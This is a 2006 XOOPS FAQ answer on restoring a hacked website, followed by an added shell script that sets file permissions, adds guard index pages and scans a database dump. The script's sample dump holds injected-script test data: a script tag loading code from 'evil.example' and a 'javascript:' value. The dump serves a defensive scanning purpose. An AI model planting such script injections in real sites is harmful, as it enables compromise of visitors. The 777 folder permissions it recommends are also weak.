My site has been hacked! What do I do?

Requested and Answered by JMorris on 2006/8/25 21:18:22

My site has been hacked! What do I do?

Here is a general outline of what to do if your site is hacked. The following assumes that you will also coordinate with your web hosting provider to determine whether the hacker compromised your site as a result of a vulnerability in the server or through a vulnerability in your site. It also assumes that you understand the basics of installing and configuring XOOPS and any modules you have installed, as well as the basic usage of an FTP program and phpMyAdmin.

1. Upload an index.html file stating that your site will be back soon and rename index.php to something like bak.index.php.

2. Download any non-XOOPS files that may need to be cleaned or restored. If your site uses altered XOOPS core files or modules, I hope you documented your changes.

3. Backup your database, being sure to use the "Drop table if exists" option in phpMyAdmin so you can restore your database later.

4. Delete all XOOPS files off of your web space, leaving only your temporary index.html.

5. Install a fresh copy of XOOPS just like a brand new site. Make sure you chmod your files and folders correctly after install! Also, to avoid incompatibilities, use the same versions of XOOPS and all modules that were previously installed. You can always upgrade them after your initial restoration.

Folders: chmod 755
Exceptions: chmod 777 (you may be able to use 755 or 775 on some hosting accounts)
  cache/
  templates_c/
  uploads/

Files: chmod 644
Exceptions: chmod 444
  mainfile.php

I would also recommend adding an index.html with the following code in every directory that does not already have an index.html or index.php:

<script>history.go(-1);</script>


6. Using a good editor, like Dreamweaver, vi, or Notepad+, search for any unusual JavaScript code in your backed-up database. A simple search for "javascript" should be sufficient.

7. After successfully reinstalling the base XOOPS system and uploading all the modules you had installed, restore your database from your cleaned backup.

8a. If all did not go well, refer to the FAQ and Forum of this site to troubleshoot why your site did not restore, then move on to 8b.

8b. If all went well, you can move on to verification. Before removing your temporary index.html, log into your site, immediately close it in your control panel, and go through and thoroughly verify that your site has been restored successfully, without any malicious code.

9. Once you've verified that your site has restored accurately and without malicious code, make a fallback backup of your database and files and upgrade your XOOPS install and modules to the latest stable versions. Then immediately perform a backup after everything has been verified to work properly.

10. Have two or three trusted members/friends log into the site and perform a final verification. If all is well, remove the temporary index.html and reopen your site.

HTH.

James
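The file-system side of steps 5 and 6 above, scripted as an added example. This is an illustration written for this page, not code from the XOOPS project or from the answer. The directory and file names it treats specially (cache/, templates_c/, uploads/, mainfile.php) and the one-line guard index.html are the ones listed in the answer; the scratch web root, the sample SQL dump lines and the function names are constructed assumptions so the script runs offline on a temporary directory. The dump scan goes a little beyond the answer's plain "javascript" search by also matching <script, onerror= and onload=.

```shell
#!/bin/sh
# Added example (not from the XOOPS project or the answer above): apply the
# answer's permission scheme, add guard index.html files, and scan a database
# dump, all on a constructed scratch tree.
set -eu

# Directories the answer says need write access (relative to the web root).
WRITABLE_DIRS="cache templates_c uploads"

# Apply the scheme: 755 dirs, 644 files, 777 writable dirs, 444 mainfile.php.
harden_xoops_perms() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    for d in $WRITABLE_DIRS; do
        if [ -d "$root/$d" ]; then chmod 777 "$root/$d"; fi
    done
    if [ -f "$root/mainfile.php" ]; then chmod 444 "$root/mainfile.php"; fi
}

# Count entries that deviate from the scheme; prints 0 when the tree conforms.
count_bad_perms() {
    root=$1
    {
        find "$root" -type d ! -perm 755 ! -name cache ! -name templates_c ! -name uploads
        find "$root" -type f ! -perm 644 ! -name mainfile.php
        find "$root" -type f -name mainfile.php ! -perm 444
    } | wc -l | tr -d ' '
}

# Count directories that have neither index.html nor index.php.
count_missing_guards() {
    find "$1" -type d \
        -exec sh -c '[ ! -e "$1/index.html" ] && [ ! -e "$1/index.php" ]' _ {} \; \
        -print | wc -l | tr -d ' '
}

# Drop the answer's one-line index.html into every directory lacking a guard.
# The second -exec only runs where the first (the test) exits 0.
add_index_guards() {
    find "$1" -type d \
        -exec sh -c '[ ! -e "$1/index.html" ] && [ ! -e "$1/index.php" ]' _ {} \; \
        -exec sh -c 'printf "<script>history.go(-1);</script>\n" > "$1/index.html"' _ {} \;
}

# Search a SQL dump for injected script; prints the number of matching lines.
# Extends the answer's plain "javascript" search with a few more markers.
scan_dump_for_scripts() {
    grep -i -c -E '<script|javascript|onerror=|onload=' "$1" || true
}

# Constructed scratch web root standing in for a freshly uploaded XOOPS tree.
make_scratch_root() {
    root=$(mktemp -d)
    mkdir -p "$root/cache" "$root/templates_c" "$root/uploads" "$root/modules/news" "$root/class"
    printf 'back soon\n' > "$root/index.html"                    # placeholder from step 1
    printf '<?php // constructed stand-in\n' > "$root/mainfile.php"
    printf '<?php // constructed stand-in\n' > "$root/modules/news/index.php"
    printf '<?php // constructed stand-in\n' > "$root/class/database.php"
    chmod 777 "$root/class" "$root/class/database.php"           # deliberately sloppy
    printf '%s\n' "$root"
}

# Constructed dump: one clean row, one with a script tag, one with a javascript: URL.
write_scratch_dump() {
    cat > "$1" <<'EOF'
INSERT INTO xoops_config VALUES (1,'sitename','Example Site');
INSERT INTO xoops_bb_posts VALUES (7,'hello <SCRIPT src="http://evil.example/x.js"></SCRIPT>');
INSERT INTO xoops_links VALUES (3,'javascript:alert(1)');
EOF
}

root=$(make_scratch_root)
add_index_guards "$root"        # guards first, so hardening also fixes their mode
harden_xoops_perms "$root"
echo "non-conforming permissions: $(count_bad_perms "$root")"     # 0
echo "directories without a guard: $(count_missing_guards "$root")" # 0
write_scratch_dump "$root/backup.sql"
echo "suspicious dump lines: $(scan_dump_for_scripts "$root/backup.sql")" # 2
rm -rf "$root"
```

Run it against a real web root by replacing make_scratch_root with the path of your fresh install, and run the dump scan against the backup from step 3 before you restore it; treat every hit as something to read, since a forum post quoting a script tag is not the same as a script tag injected into a template.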

This Q&A was found on XOOPS Web Application System: http://xoops.org/modules/smartfaq/faq.php?faqid=621